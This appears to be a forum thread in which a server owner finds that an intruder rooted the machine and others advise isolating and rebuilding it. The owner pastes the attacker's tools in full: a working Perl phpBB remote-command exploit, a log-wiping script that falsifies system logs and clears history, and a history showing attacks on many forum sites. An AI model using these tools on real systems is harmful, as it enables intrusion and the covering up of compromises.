viooltje

Well-Known Member
Mar 14, 2004
60
0
156
My root acces alert suddenly changed from this:

Root Access ALERT on: Fri Jul 6 02:12:27 CEST 2007 root pts/1 Jul 6 02:12 (a80-126-105-31.adsl.xs4all.nl)

to this:

Root Access ALERT on: Sat Jul 21 02:03:49 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229)

??

Who or what is a cristi?

then I tried again I got this:
(a80-126-105-31.adsl.xs4all.nl)

Root Access ALERT on: Sat Jul 21 03:33:18 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229) root pts/2 Jul 21 03:33 (a80-126-105-31.adsl.xs4all.nl)

who or what is cristi? A hacker?

How do I remove this cristi?
 

viooltje

Well-Known Member
Mar 14, 2004
60
0
156
[email protected] [~]# last
root pts/0 a80-126-105-31.a Sat Jul 21 03:56 still logged in
root pts/0 a80-126-105-31.a Sat Jul 21 03:46 - 03:53 (00:07)
root pts/0 a80-126-105-31.a Sat Jul 21 03:43 - 03:46 (00:02)
root pts/2 a80-126-105-31.a Sat Jul 21 03:37 gone - no logout
root pts/2 a80-126-105-31.a Sat Jul 21 03:33 - 03:37 (00:04)
root pts/2 a80-126-105-31.a Sat Jul 21 03:19 - 03:33 (00:13)
cristi pts/1 86.55.185.229 Fri Jul 20 14:27 - 15:20 (00:53)
cristi pts/0 86.55.185.229 Thu Jul 19 16:14 - 03:43 (1+11:29)
cristi pts/0 86.55.185.229 Thu Jul 19 15:52 - 16:10 (00:17)
cristi pts/0 89.32.42.170 Tue Jul 17 00:22 - 01:57 (01:34)
cristi pts/1 89.32.42.170 Mon Jul 16 18:19 - 18:50 (00:30)
cristi pts/0 89.32.42.170 Mon Jul 16 18:17 - 19:11 (00:54)
cristi pts/0 89.32.42.170 Mon Jul 16 11:24 - 12:02 (00:38)
root pts/2 a80-126-105-31.a Fri Jul 13 01:53 - 01:54 (00:00)
root pts/0 a80-126-105-31.a Thu Jul 12 02:58 - 03:11 (00:13)
cristi pts/0 86.127.243.160 Wed Jul 11 23:57 - 00:08 (00:11)
cristi pts/0 86.127.243.160 Wed Jul 11 12:05 - 14:29 (02:23)
cristi pts/3 86.127.243.134 Tue Jul 10 22:22 - 02:54 (04:31)
cristi pts/3 89.32.42.170 Tue Jul 10 22:12 - 22:13 (00:01)
cristi pts/3 86.127.243.134 Tue Jul 10 16:58 - 21:09 (04:10)
cristi pts/3 86.127.243.134 Tue Jul 10 15:01 - 15:22 (00:21)
root pts/0 a80-126-105-31.a Mon Jul 9 23:41 - 01:39 (01:58)
reboot system boot 2.6.9-55.0.2.ELs Mon Jul 9 23:39 (11+04:26)
root pts/1 a80-126-105-31.a Mon Jul 9 22:39 - 22:43 (00:03)
root pts/1 a80-126-105-58.a Mon Jul 9 19:49 - 20:18 (00:29)
root pts/0 a80-126-105-58.a Mon Jul 9 19:03 - 19:56 (00:53)
root pts/0 a80-126-105-31.a Sun Jul 8 03:41 - 04:19 (00:38)
root pts/1 a80-126-105-31.a Sat Jul 7 00:28 - 00:32 (00:03)
root pts/1 a80-126-105-31.a Fri Jul 6 02:12 - 02:29 (00:17)
root pts/0 a80-126-105-31.a Thu Jul 5 01:34 - 02:39 (01:04)
root pts/0 a80-126-105-31.a Thu Jul 5 01:25 - 01:28 (00:02)
root pts/0 a80-126-105-31.a Thu Jul 5 00:02 - 01:24 (01:21)
root pts/0 a80-126-105-31.a Wed Jul 4 22:56 - 23:56 (01:00)
reboot system boot 2.6.9-55.0.2.ELs Wed Jul 4 22:55 (16+05:10)
root pts/0 a80-126-105-31.a Tue Jul 3 22:44 - 23:19 (00:34)

cristi account has accessed my system
how can I get to know what this account is doing in my system
is there a command to retrieve history list of the other user?
is there a coomand to see when this account has been created?

any help would be welcome thnx allot.
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
:( You have been hacked. What they did will take some time to find out. More than one IP was used so either there is more than one person or they are using something else to access your system.

If you can, take the machine offline and start digging. Be sure to isolate any backups from the server so they cannot delete them.

At very least look at the main password files to see if they added accounts and check /home to see if new folders have been made, but you have a ton of other things to check out.
 

viooltje

Well-Known Member
Mar 14, 2004
60
0
156
#1184853141
cd /lib/fbi
#1184853259
./f www.darkdeed.net/phpBB/
#1184853607
cat /home/cristi/.bash_history
#1184853618
./f joeys.clanwar.hu/
#1184853656
> /home/cristi/.bash_history
#1184853659
./f joeys.clanwar.hu/
#1184853664
cat /home/cristi/.bash_history
#1184934451
nc -l -p 8000 -vv
#1184854460
cd /lib/fbi
#1184934308
./f www.sandharlanden.net/lan/forum/
#1184934390
./f augu.twbbs.org/phpBB2/
#1184934691
./f augu.twbbs.org/phpBB2/
#1184934695
./f www.japania.org/foorumi/
#1184934908
./f naniwa.starryhometown.net/forum/
#1184934961
./f smallville.andyweb.net/forum/
#1184935055
./f smallville.andyweb.net/forum/
#1184951957
netstat -aut
#1184951970
ps -ax
#1184952010
netatat- ait
#1184952015
netstat -aut
#1184952069
nice
#1184954518
dyweb.net/forum/
#1184954520
./f smallville.andyweb.net/forum/
#1184954608
./f forum.ioche.it/
#1184954637
./f forum.ioche.it/
#1184954745
./f forum.ioche.it/
#1184954792
./f smallville.andyweb.net/forum/
#1184954876
./f smallville.andyweb.net/forum/
#1184961835
./f www.ourtradingclub.com/forum/
#1184961887
./f www.scribbly.net/forum/
#1184961934
./f www.tmetz.net/forums/
#1184962444
./f www.thegrumpystrumpet.com/brassrail/
#1184962504
./f www.jcpbook.com/phpbbX/
#1184962552
./f home.exetel.com.au/getinfo/connect/forum/
#1184962632
./f www.youngrepublicanclub.net/bb/
#1184985536
w
#1184985543
netstat -aut
#1184985646
locate lord
#1184985652
cd /home
#1184985652
ls
#1184985656
cd /var/ww
#1184985660
cd /var/www
#1184985661
ls
#1184985664
cd html
#1184985664
ls
#1184985668
cd ..
#1184985669
cd ..
#1184985670
uname -a

this is what he did what should I do now?
 

viooltje

Well-Known Member
Mar 14, 2004
60
0
156
he got a /home/cristi while a dir called.ssh
which includes a key:

61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

that's how he accessed I think.

how lame to hack a cheap unsecured one man machine!!
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
Judging from your "last" command he was in several times over the last week or so. Sometimes for over an hour.

I think he loaded something on port 8000 using netcat to test it first.

But your list of commands here is likely to only be a small chunk of what he did during all that time.

You really need to isolate this machine and start digging. Worst case scenario you have to reload the O/S and reload good backups.
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
he got a /home/cristi while a dir called.ssh
which includes a key:

61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

that's how he accessed I think.

how lame to hack a cheap unsecured one man machine!!
h23-61-59-108.chinup.com.tw is where he most likely resides. Hacking any machine gives them alot of power, if he truly owns the box he can make it do anything for free and you get the blame.

:(
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
If you do not own the machine you might contact your ISP/HOST and they might help you for free, but most likely they will tell you to reload the O/S and the backups of everything.

However when thats done you will be back to the point right before you got hacked, so you would need to find out what let them in.
 

verdon

Well-Known Member
Nov 1, 2003
919
11
168
Northern Ontario, Canada
cPanel Access Level
Root Administrator
I too think you should start fresh. That's just based on reading these forums for a couple of years. I only have experience with configserver.com (user chirpy here) for paid services of the sort you need, and have been very happy with them. I'm sure there are other users here that are good too, but I can only personally recommend them.

Good luck.
 

lehels

Well-Known Member
Jul 10, 2006
91
0
156
Which person or company should I hire to solve this problem?
Someone who "speaks" the Unix~ language,

Don't forget a firewall!
Change usual ssh port,

Keep on eye your intruder, precisly deny all unwanted access,

G.luck,
 

viooltje

Well-Known Member
Mar 14, 2004
60
0
156
what does this:
./f www.darkdeed.net/phpBB/

he is using this code in the f file:
perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


and allot scripts containing this code:

#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:eek::");

$url = $opt_u;
$login = $opt_L;
$password = $opt_P;
$id = $opt_i || 2;
$prefix = $opt_p || 'phpbb_';
$proxy = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
$res = $xpl->post($url.'login.php',
[
"username" => "$login",
"password" => "$password",
"autologin" => "on",
"admin" => "1",
"login" => "Log in",
],"User-Agent" => "$ids");
$cookie_jar->extract_cookies($res);
if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }
while ()
{
print "by Alexander for FbiTeam\n";
print "Command for execute or 'exit' for exit # ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit');
last;
}
&run($cmd);
}

sub run($)
{
$sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
&phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);
$res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
@result = split(/\n/,$res->content);
$data = '';
$on = $start = $end = 0;
for (@result)
{
if (/_END_/) { $end = 1; last; }
if ($on) { $data .= $_."\n"; }
if (/_START_/) { $on = 1; $start = 1; }
}
if($start&&$end) { print $data."\r\n"; }
}

sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content => [
perform => 'restore',
restore_start => 'Start Restore',
backup_file => [
undef,
'0wneeeeedddd',
Content_type => 'text/plain',
Content => "$_[1]",
],
]
,"User-Agent" => "$ids");
}

sub usage()
{
print "\\=--------------------------------------=/\r\n";
print "| phpBB admin2exec exploit by Alexander |\r\n";
print "| version 2 (user_sig_bbcode_uid) |\r\n";
print "/=--------------------------------------=\\\r\n";
print "\r\n Usage: a [OPTIONS]\r\n\r\n";
print " Options:\r\n";
print " -u - path to forum e.g. http://site/f...)\r\n"; exit(); } ??? phpbb hacker?
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
??? phpbb hacker?
At least. I mean he has full access to your computer so for now he is launching phpbb exploit attacks. Given enough time he will turn your machine into a super hacking server.
 

viooltje

Well-Known Member
Mar 14, 2004
60
0
156
Hacked and more found zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

Hacked and more found zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

Can't find anything on google nor in the forums someone know something about this stuff?

found this in the 'anti.pdf' file:

#!/bin/bash
#
# zxc-Antilog V 0.1
#
# usage : to Exchanging your IP with fake IP at your choice
#
# and to clear your last command's and clear logout history
#
# Remember that...
#
# Whitehat 2006
#
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo " zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro) - [email protected] "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ? "
read word
word=$word
echo -n " What's the Fake ip y0 want using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
echo " i can't find access_log "
http="no"
fi
if [ "$http" = "yes" ]; then
echo " Editing access_log"
sed "s/$word/$fake/g" /var/log/httpd/access_log > /var/log/httpd/access_log.new
mv /var/log/httpd/access_log.new /var/log/httpd/access_log
fi
httpd="yes"
if [ ! -f /var/log/httpd/error_log ]; then
echo " i can't find error_log "
httpd="no"
fi
if [ "$httpd" = "yes" ]; then
echo " Editing error_log "
sed "s/$word/$fake/g" /var/log/httpd/error_log > /var/log/httpd/error_log.new
mv /var/log/httpd/error_log.new /var/log/httpd/error_log
fi
wtmp="yes"
if [ ! -f /var/log/wtmp ]; then
echo " i can't find wtmp "
wtmp="no"
fi
if [ "$wtmp" = "yes" ]; then
echo " Editing wtmp "
sed "s/$word/$fake/g" /var/log/wtmp > /var/log/wtmp.new
mv /var/log/wtmp.new /var/log/wtmp
fi
secure="yes"
if [ ! -f /var/log/secure ]; then
echo " i can't find secure "
secure="no"
fi
if [ "$secure" = "yes" ]; then
echo " Editing secure "
sed "s/$word/$fake/g" /var/log/secure > /var/log/secure.new
mv /var/log/secure.new /var/log/secure
fi
xferlog="yes"
if [ ! -f /var/log/xferlog ]; then
echo " i can't find xferlog "
xferlog="no"
fi
if [ "$xferlog" = "yes" ]; then
echo " Editing xferlog "
sed "s/$word/$fake/g" /var/log/xferlog > /var/log/xferlog.new
mv /var/log/xferlog.new /var/log/xferlog
fi
utmp="yes"
if [ ! -f /var/run/utmp ]; then
echo " i can't find utmp "
utmp="no"
fi
if [ "$utmp" = "yes" ]; then
echo " Editing utmp "
sed "s/$word/$fake/g" /var/run/utmp > /var/run/utmp.new
mv /var/run/utmp.new /var/run/utmp
fi
echo -n " if y0 want to delete the last commands type (yes) if y0 don't type (no) 0r anything "
read command
if [ "$command" = "yes" ]; then
echo "##Now the last commands y0 put it will go to hell ^_^ ##"
echo -n > ~/.bash_history
history -c
echo -n " y0 have one minute to exit from server..go0d luck "
/etc/init.d/atd start
echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
echo " zxc-Antilog Ended work... Cheers ! "
exit 0
else
echo -n " y0 have one minute to exit from server..go0d luck "
/etc/init.d/atd start
echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
echo " zxc-Antilog Ended work... Cheers ! "
exit 0
fi
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,133
1
168
New York
Your system was rooted yesterday, isnt that right ?. Expect to find more and more stuff until you restore the machine and block out whatever is letting them in.
 

dgbaker

Well-Known Member
PartnerNOC
Sep 20, 2002
2,561
9
343
Toronto, Ontario Canada
cPanel Access Level
DataCenter Provider
You need to get that server off the network and the internet. The longer it is up the more damage is done. Let alone because your server has been compromised you are putting others at risk of an attack from your server.

Take it offline, and start rebuilding and closing the holes.